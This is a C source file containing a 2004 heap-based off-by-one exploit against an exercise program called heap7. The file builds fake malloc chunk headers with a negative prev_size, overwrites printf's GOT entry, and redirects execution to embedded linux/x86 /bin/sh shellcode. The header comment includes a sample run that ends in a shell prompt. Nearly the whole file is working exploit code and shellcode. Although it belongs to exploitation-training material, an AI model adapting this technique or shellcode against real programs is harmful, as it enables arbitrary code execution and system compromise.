/*
 * $Id: heap7-ex.c,v 1.1 2004/06/02 12:15:03 raptor Exp $
 *
 * heap7-ex.c - heap7.c exploit (heap-based off-by-one)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit uses the heap-based off-by-one technique outlined in the
 * http://www.thc.org/root/docs/exploit_writing/heap_off_by_one.txt paper
 * by qitest1 <qitest1@bespin.org>. 
 *
 * The previous solution to heap6.c "has a big disadvantage: we need to control
 * the first 8 bytes of the buffer whose size is set to zero, and this is
 * improbable (even if not impossible) in real life. We need another idea. [...]
 * The remaining solution is to set the prev_size field to a negative value 
 * (i.e.: 0xfffffff0): this method allow us to write an arbitrary value in an 
 * arbitrary location: we put a fake malloc structure in the location pointed 
 * to by the negative prev_size. Nevertheless, after that it segfaults. This is 
 * generally not a problem in real programs, such as network daemons, because 
 * they always have signal handlers: if we patch the GOT entry of one of the 
 * functions called in the SIGSEGV handler (i.e.: syslog()), we can still 
 * control the program flow".
 *
 * Structure of buf1: [AAAA] [AAAA] [FAKE_SIZE]
 * Structure of buf2: ["A"x9] [FAKE_SIZE] [FAKE_SIZE] [printf_addr - 12] [ret]
 *
 * raptor@karma:~/devel/heap$ uname -a
 * Linux karma 2.4.18-1-686-smp #1 SMP Mon Jan 5 20:42:23 UTC 2004 i686 unknown
 * raptor@karma:~/devel/heap$ gcc --version
 * 2.95.4
 * raptor@karma:~/devel/heap$ ./heap7-ex
 * Using ret address       : 0xbfffffcf
 * Using printf() address  : 0x80499d4
 *
 * len0: 12
 * len1: 41
 * p0 -> 0x8049a10
 * p1 -> 0x8049a20
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 49 (0x31)
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 0 ((nil))
 * sh-2.05a$ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define	VULN		"./heap7"	// the vulnerable program
#define BUF1SIZE	12 + 1		// size of buf1
#define BUF2SIZE	1024		// max size of buf2
#define	FAKE_SIZE	0xffffffe0	// -32 (PREV_INUSE = 0)
#define PRINTF		0x080499d4	// printf() address in .got

char sc[] = /* linux/x86 shellcode (12 + 24 = 36 bytes) */
"\xeb\x0aWHO_CARES?"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf1[BUF1SIZE], buf2[BUF2SIZE];
	char	*p;

	char	*env[2] = {sc, NULL};
	int	printf_addr = PRINTF;

	/* calculate the ret address in envp */
	int 	ret = 0xbffffffa - strlen(sc) - strlen(VULN);

	/* prepare buf1 */
	p = buf1;
	memset(p, 'A', 8);
	p += 8;
	*((void **)p) = (void *)(FAKE_SIZE);
	p += 4;
	*p = 0x0;

	/* prepare buf2 */
	bzero(buf2, sizeof(buf2));
	p = buf2;
	memset(p, 'A', 9);
	p += 9;
	*((void **)p) = (void *)(FAKE_SIZE);
	p += 4;
	*((void **)p) = (void *)(FAKE_SIZE);
	p += 4;
	*((void **)p) = (void *)(printf_addr - 12);	/* fd field */
	p += 4;
	*((void **)p) = (void *)(ret);			/* bk field */
	p += 4;

	/* print some output */
	fprintf(stderr, "Using ret address\t: %p\n", ret);
	fprintf(stderr, "Using printf() address\t: %p\n\n", printf_addr);

	/* run the vulnerable program */
	execle(VULN, VULN + 2, buf1, buf2, NULL, env);
	perror("execle");
}
